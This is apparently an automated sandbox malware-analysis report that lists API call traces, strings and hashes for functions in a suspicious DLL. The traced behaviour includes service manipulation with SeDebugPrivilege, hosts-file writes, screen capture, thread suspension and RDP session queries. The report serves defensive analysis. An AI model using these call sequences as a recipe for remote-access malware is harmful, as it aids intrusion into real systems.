                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$#858$#535#540#922#939
                                                          • String ID:
                                                          • API String ID: 1721966335-0
                                                          • Opcode ID: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                          • Instruction ID: 1068962097da1abb9be03f2cf21bec5754a184422a1b80b0b6d5662a040d76a2
                                                          • Opcode Fuzzy Hash: d3eaab9370e68b490d7de8f8f62eee078f09842f4a933f1445def97a6244d3b3
                                                          • Instruction Fuzzy Hash: 7D319A79108381ABC305DB68D551F9FBBE9EF98A14F400A1DF49993282DB34E608C767
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000008), ref: 100196A1
                                                          • OpenServiceA.ADVAPI32(00000000,?,00000002), ref: 100196D9
                                                          • LockServiceDatabase.ADVAPI32(00000000), ref: 100196E2
                                                          • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10019728
                                                          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 10019733
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10019740
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10019743
                                                          • Sleep.KERNEL32(000000C8), ref: 1001974A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$Open$CloseDatabaseHandleProcess$ChangeConfigCurrentLockManagerSleepTokenUnlock
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2207141857-2896544425
                                                          • Opcode ID: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                          • Instruction ID: dc65207eb95ef46fdda0787c0b6e18c9b4e2414683cc893defa47448b081054d
                                                          • Opcode Fuzzy Hash: 2f3acc30e24ab5a10817afa1dfb6eda61875a7786e2a6d68692a696860b2cb32
                                                          • Instruction Fuzzy Hash: D2213D3925411467E320AB789C4AFEB3B98FB94760F140326FA199B2C1DD74EC448675
                                                          APIs
                                                            • Part of subcall function 10014700: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA,?,?,0000005C), ref: 10014730
                                                            • Part of subcall function 10014700: GetProcAddress.KERNEL32(00000000), ref: 10014737
                                                            • Part of subcall function 10014700: #823.MFC42(?), ref: 10014763
                                                            • Part of subcall function 10014700: #823.MFC42(?,?), ref: 100147DA
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAA6
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAE3
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AAF3
                                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB03
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB0A
                                                          • lstrlenA.KERNEL32(?,?,?,?,?,00000000,771A83C0,771B32C0,771B23A0), ref: 1001AB11
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$#823lstrlen$AddressCloseCreateHandleLibraryLoadProcReadSize
                                                          • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                          • API String ID: 1069036285-946259135
                                                          • Opcode ID: df90664eb78daaf17b084ec3dd52f149eb00f509864bfbe91833f7a04b4eb480
                                                          • Instruction ID: 0aff0654b9bdd9743d2db3a9601396fee1076ca62053bb4e33c3f03652fb2de6
                                                          • Opcode Fuzzy Hash: df90664eb78daaf17b084ec3dd52f149eb00f509864bfbe91833f7a04b4eb480
                                                          • Instruction Fuzzy Hash: 2C210731204750AFE310CB68CC91BEBB7E9FB89350F444A2CF649972D0DA755A05CBA1
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 10019871
                                                          • OpenServiceA.ADVAPI32(00000000,?,00000034), ref: 100198A9
                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 100198B7
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 100198DA
                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 100198ED
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FA
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100198FD
                                                          • Sleep.KERNEL32(000000C8), ref: 10019904
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$Open$CloseHandleProcess$ControlCurrentManagerQuerySleepStartStatusToken
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 3878120848-2896544425
                                                          • Opcode ID: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                          • Instruction ID: 50e31cc6d71f3cb09cdeb76e9080be0a7887b9f28361484d1c1b8db58f74100a
                                                          • Opcode Fuzzy Hash: 3686d3d753bd6d724ea35e6a9d07ba9d6be5f52da5a1c1b2a9d2d1cb915500a3
                                                          • Instruction Fuzzy Hash: C721EB352502146BE714EB609C8AFBF77D4FB88350F15061AFA0A9A1C0EEB4AD448665
                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 100296A0
                                                          • GetCurrentProcess.KERNEL32(?), ref: 100296AB
                                                          • IsWow64Process.KERNEL32(00000000), ref: 100296B2
                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 100296FD
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 10029717
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 1002973C
                                                          • CloseHandle.KERNEL32(00000000), ref: 10029745
                                                          Strings
                                                          • \sysnative\drivers\etc\hosts, xrefs: 100296C2
                                                          • \system32\drivers\etc\hosts, xrefs: 100296C9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Process$AttributesCloseCreateCurrentDirectoryHandleWindowsWow64Write
                                                          • String ID: \sysnative\drivers\etc\hosts$\system32\drivers\etc\hosts
                                                          • API String ID: 4291671391-1011561390
                                                          • Opcode ID: db3a35173908d9654b0b6390464422d008ffc226902989ae664d1e8bcc7fc4df
                                                          • Instruction ID: 876cb9e05e234248209060b7e9a497e303e77612ab2a4bb1b8b68881567da2e9
                                                          • Opcode Fuzzy Hash: db3a35173908d9654b0b6390464422d008ffc226902989ae664d1e8bcc7fc4df
                                                          • Instruction Fuzzy Hash: C321C5352043056BE324DB78DC49F9B7B98FB84720F140F2CFA9A972D0DAB09D0987A1
                                                          APIs
                                                          • #2614.MFC42(?,?,10007AFF), ref: 10008084
                                                          • #860.MFC42(*.*,?,?,10007AFF), ref: 10008091
                                                          • #3811.MFC42(?,*.*,?,?,10007AFF), ref: 100080B2
                                                          • #3811.MFC42(?,?,*.*,?,?,10007AFF), ref: 100080C1
                                                          • #3811.MFC42(?,?,?,*.*,?,?,10007AFF), ref: 100080D0
                                                          • #3811.MFC42(?,?,?,?,*.*,?,?,10007AFF), ref: 100080DF
                                                          • #3811.MFC42(?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080EE
                                                          • #3811.MFC42(?,?,?,?,?,?,*.*,?,?,10007AFF), ref: 100080FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #3811$#2614#860
                                                          • String ID: *.*
                                                          • API String ID: 4293058641-438819550
                                                          • Opcode ID: 9a1bd5b303f82e1101b9f388daf2ff61e48d11c0f8e37bea33aad176008b9ec5
                                                          • Instruction ID: 666ce54a2a265a37b10a0135446347dcc930d7d9a3e7cb816894ca7fb184fd78
                                                          • Opcode Fuzzy Hash: 9a1bd5b303f82e1101b9f388daf2ff61e48d11c0f8e37bea33aad176008b9ec5
                                                          • Instruction Fuzzy Hash: 5D11B3B5404B059FC7A4CFA5D681946BBE5FE886007848A2EA18AC7A24E770F504DF50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,.23,00000000,?,00000000,10005979,?,?), ref: 100059E4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100059ED
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,00000000,10005979,?,?), ref: 100059FB
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100059FE
                                                          • malloc.MSVCRT ref: 10005A1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$malloc
                                                          • String ID: .23$KERNEL32.dll$MultiByteToWideChar$lstrlenA
                                                          • API String ID: 1625907898-566195008
                                                          • Opcode ID: 5775f1e7eb7e2f5d9e18227d5eded49f95364944b1adf940be7b042424f80c18
                                                          • Instruction ID: cce5c33cb54e4e20ebcd19e924e9cf720d43bdeab14a6bb2b58a7cbeabffb214
                                                          • Opcode Fuzzy Hash: 5775f1e7eb7e2f5d9e18227d5eded49f95364944b1adf940be7b042424f80c18
                                                          • Instruction Fuzzy Hash: A5F0C8E25403196BE620ABB48C46E7BB7ECEF85351F05482AF545D3240DA68E8008771
                                                          APIs
                                                            • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                            • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                          • GetCursorPos.USER32(?), ref: 10018246
                                                          • GetSystemMetrics.USER32(00000000), ref: 10018255
                                                          • _ftol.MSVCRT ref: 10018273
                                                          • _ftol.MSVCRT ref: 10018288
                                                          • GetCursorInfo.USER32(?,?,00000008), ref: 100182AE
                                                          • DestroyCursor.USER32(?), ref: 100182D9
                                                          • BitBlt.GDI32(?,00000000,00000000,10016B8A,?,?,00000000,00000000,?), ref: 1001831C
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 10018373
                                                          • Sleep.KERNEL32(00000001), ref: 10018393
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 1001839C
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Cursor$CounterPerformanceQuery_ftol$DestroyInfoMetricsReleaseSleepSystem
                                                          • String ID:
                                                          • API String ID: 2306850792-0
                                                          • Opcode ID: bb3ab1a7d1fb864ae3465332f95efda82989cf761ace87dd28a93c5291d193c7
                                                          • Instruction ID: ed20b3c1f5c79fd808ca28f3e705cb4aa4f98cfa336912cfc5d34cc1cf5afb6b
                                                          • Opcode Fuzzy Hash: bb3ab1a7d1fb864ae3465332f95efda82989cf761ace87dd28a93c5291d193c7
                                                          • Instruction Fuzzy Hash: 43517B75204B019FE324DF29C890B5BB7E5FB88700F544A1DF6A69B290E770FA85CB61
                                                          APIs
                                                          • ReleaseDC.USER32(00000000,?), ref: 10018034
                                                          • DeleteDC.GDI32(?), ref: 10018044
                                                          • DeleteDC.GDI32(?), ref: 1001804A
                                                          • DeleteDC.GDI32(?), ref: 10018050
                                                          • DeleteObject.GDI32(?), ref: 1001805C
                                                          • DeleteObject.GDI32(?), ref: 10018062
                                                          • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018083
                                                          • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 10018093
                                                          • #825.MFC42(?,?,?,?,?,?,?,10098B7C,000000FF,10017FE8), ref: 100180A3
                                                          • DestroyCursor.USER32(?), ref: 100180C9
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Similarity
                                                          • API ID: Delete$#825$Object$CursorDestroyRelease
                                                          • String ID:
                                                          • API String ID: 719826280-0
                                                          • Opcode ID: 90877511eecfd0b4e7a431cebd02d7416917aa731a6839dde4062e1f4328a9cd
                                                          • Instruction ID: ee9c09a91b7e4212c511851f40033770f7d05fd05274aa2e52ec135f7c4494b2
                                                          • Opcode Fuzzy Hash: 90877511eecfd0b4e7a431cebd02d7416917aa731a6839dde4062e1f4328a9cd
                                                          • Instruction Fuzzy Hash: 8921BFB6600B049BE620DF65CC80B57B3ECFF88610F050A1DE59A97790CB79F9048BA1
                                                          APIs
                                                            • Part of subcall function 1002BE50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002BE71
                                                            • Part of subcall function 1002BE50: Process32First.KERNEL32(00000000,00000000), ref: 1002BE8B
                                                            • Part of subcall function 1002BE50: _strcmpi.MSVCRT ref: 1002BEA7
                                                            • Part of subcall function 1002BE50: Process32Next.KERNEL32(00000000,?), ref: 1002BEB6
                                                            • Part of subcall function 1002BE50: CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 1002BEC0
                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 1002C3E2
                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 1002C3FC
                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 1002C422
                                                          • #823.MFC42(?), ref: 1002C42F
                                                          • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 1002C451
                                                          • #823.MFC42(00000100), ref: 1002C473
                                                          • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 1002C4A3
                                                          Similarity
                                                          • API ID: Token$#823InformationOpenProcessProcess32$AccountCloseCreateFirstHandleLookupNextSnapshotToolhelp32_strcmpi
                                                          • String ID: explorer.exe
                                                          • API String ID: 1409679202-3187896405
                                                          • Opcode ID: cdf207af64fab364c8e5cf922331446714e2d043d2f38fccba7b385bc9961bc5
                                                          • Instruction ID: 473375eb415be4f23099c9e5e37f9ddbe1d6da3e806a8c1c49872e14675b6481
                                                          • Opcode Fuzzy Hash: cdf207af64fab364c8e5cf922331446714e2d043d2f38fccba7b385bc9961bc5
                                                          • Instruction Fuzzy Hash: D2412CB6D00228AFDB51EF99EC85FEEBBB8FB48710F10415AF509A3240D6715A40CFA0
                                                          Similarity
                                                          • API ID: sprintfwsprintf$FileModuleName
                                                          • String ID: %s:%d
                                                          • API String ID: 2407558147-1029262843
                                                          • Opcode ID: d8ece532bf8bfa30307ab5f6c4ca2f51895a1ec57feebc5c8603eadae0ee97b2
                                                          • Instruction ID: 55c58eea656593305c6b8ce4493de1aab1e6244091f29be18d83a82a7fdf8e2b
                                                          • Opcode Fuzzy Hash: d8ece532bf8bfa30307ab5f6c4ca2f51895a1ec57feebc5c8603eadae0ee97b2
                                                          • Instruction Fuzzy Hash: C521F57A4042096FD224C724DC84FEBB3D9EBE4310F45492DFA9893140EBB46A46CB92
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10026C36
                                                          • lstrcatA.KERNEL32(?,?), ref: 10026C48
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 10026C65
                                                          • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 10026C76
                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10026C93
                                                          • CloseHandle.KERNEL32(00000000), ref: 10026C9A
                                                          • LocalFree.KERNEL32(?), ref: 10026CCA
                                                          Similarity
                                                          • API ID: File$CloseCreateDirectoryFreeHandleLocalPointerSystemWritelstrcat
                                                          • String ID: p
                                                          • API String ID: 3379061965-2181537457
                                                          • Opcode ID: dff563a2350ad42211304f3934d3364c625aae18de2b9c5e09d3b81c4ae3f541
                                                          • Instruction ID: 60c71b90a0802acaa0e5dbf25da7476a72f7519069fb5f0452f7d82c481299c6
                                                          • Opcode Fuzzy Hash: dff563a2350ad42211304f3934d3364c625aae18de2b9c5e09d3b81c4ae3f541
                                                          • Instruction Fuzzy Hash: 8621DE75244305ABE310DF58CC85FDBB7E8FBC8704F044A1DF68996190D774A608CBA2
                                                          APIs
                                                            • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                            • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 100291FA
                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 1002920B
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?,?,?,00000000,0000001C,00000004,00000000), ref: 10029240
                                                          • SuspendThread.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029245
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,0000001C,00000004,00000000), ref: 10029248
                                                          • Thread32Next.KERNEL32(00000000,?), ref: 10029254
                                                          • CloseHandle.KERNEL32(00000000,00000000,0000001C,00000004,00000000), ref: 10029260
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextSnapshotSuspendTokenToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 3882456823-2896544425
                                                          • Opcode ID: 21207cfc81d0fa30fd38e5c79fccdacdf40486e218a730a008db783386ba6bf6
                                                          • Instruction ID: 0dba8d27cde3c0ec8bc65889917dbe9669003c362c892a02e3719d3f6e3c27b7
                                                          • Opcode Fuzzy Hash: 21207cfc81d0fa30fd38e5c79fccdacdf40486e218a730a008db783386ba6bf6
                                                          • Instruction Fuzzy Hash: A201A135201314BFE600DB559C81FAFB3E8FFC5650F854919FA4457280E771AD08CBA6
                                                          APIs
                                                          • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B60
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B80
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024B94
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BA8
                                                          • WTSFreeMemory.WTSAPI32(?,00000000,?,00000010,?,?,?,?,?,?,?), ref: 10024BBB
                                                          Similarity
                                                          • API ID: FreeMemory$InformationQuerySession
                                                          • String ID: Console$ICA$RDP
                                                          • API String ID: 2964284127-2419630658
                                                          • Opcode ID: 98709c8a763e5f8c0ce8a9a3b3f6a2cbe279578f64dee6fe19232cbc7fead75c
                                                          • Instruction ID: daa9930ab6a818d1eab33b51c98bebeb05cf46278a298f17033160faa8d90bf6
                                                          • Opcode Fuzzy Hash: 98709c8a763e5f8c0ce8a9a3b3f6a2cbe279578f64dee6fe19232cbc7fead75c
                                                          • Instruction Fuzzy Hash: 4601F5B6618235678504EB5CBC418EBB2E8EB90A55F49442AF984D7200E630ED1CCBF6
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00020019,?), ref: 1002AE32
